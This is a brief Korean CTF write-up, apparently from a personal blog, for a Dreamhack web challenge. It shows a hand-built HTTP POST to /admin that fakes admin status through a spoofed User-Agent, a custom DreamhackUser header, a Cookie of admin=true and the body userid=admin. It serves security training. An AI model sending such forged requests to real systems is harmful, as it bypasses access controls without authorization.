HTTP 요청 헤더를 직접 작성해야 한다.
요청 헤더에 들어가야할 내용은 코드를 통해 힌트를 얻을 수 있다.
POST 메소드
/admin
User-Agent
DreamhackUser
Cookie
body에는 userid가 포함된다.
이 외에도 기본으로 추가되어야 할 값은
Host
Content-Type
Content-Length
가 있다.
POST /admin HTTP/1.1
Host: {해당 URL}
User-Agent: Admin Browser
DreamhackUser: admin
Cookie: admin=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
userid=admin
728x90
'Security > Write Up' 카테고리의 다른 글
| [Dreamhack] web-ssrf (0) | 2023.08.28 |
|---|---|
| [Dreamhack] Flying Chars (0) | 2023.08.25 |
| [wargame.kr] login filtering (0) | 2023.08.21 |
| [Dreamhack] simple_sqli_chatgpt (0) | 2023.08.21 |
| [Dreamhack] pathtraversal (0) | 2023.08.21 |